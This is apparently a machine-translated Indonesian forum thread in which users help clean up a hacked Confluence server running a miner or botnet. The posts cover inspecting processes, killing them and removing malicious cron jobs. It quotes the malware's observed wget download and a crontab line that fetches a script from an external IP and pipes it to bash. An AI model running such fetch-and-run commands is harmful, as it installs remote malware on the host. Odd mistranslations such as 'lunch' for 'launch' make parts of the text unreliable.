Server Anda sepertinya diretas. Silakan lihat daftar proses dengan cermat.e.g. jalankan ps auxc dan lihat proses sumber biner.
Anda dapat menggunakan alat seperti rkhunter untuk memindai server Anda, tetapi secara umum Anda harus pada awalnya membunuh semua yang telah makan siang sebagai pengguna pertemuan, memindai server/akun Anda, memutakhirkan pertemuan Anda (dalam kebanyakan kasus pengguna menentukan sumber serangan), dan lihat dalam pertemuan Anda untuk akun tambahan, dll.
Apakah Anda ingin melihat apa yang ada dalam proses itu, lihat /proc mis. di ls -la /proc/996 . Anda juga akan melihat biner sumber di sana. Anda juga bisa makan siang strace -ff -p 996 untuk melihat proses apa yang sedang dilakukan atau cat /proc/996/exe | strings untuk melihat string apa yang dimiliki biner. Ini mungkin semacam bagian botnet, penambang, dll.
Saya memiliki masalah yang sama, diretas, skrip virus berada di/tmp, temukan nama skrip dari perintah "top" (huruf tidak penting, nama "fcbk6hj" adalah milik saya.) dan matikan prosesnya (mungkin 3 proses)
akar 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
bunuh semuanya dan hapus /tmp/prot, dan matikan proses /boot/vmlinuz, CPU kembali.
Saya menemukan bahwa virus telah mengunduh skrip ke /tmp secara otomatis, metode saya adalah mv wgetak ke nama lain.
Perilaku virus:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
ditemukan tugas berikut ditulis dalam crontab, hapus saja:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame
Setelah menghapus ini dari sistem dan crontab, mungkin merupakan ide bagus (setidaknya untuk saat ini) untuk menambahkan pengguna pertemuan ke /etc/cron.deny .
Dan setelah:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information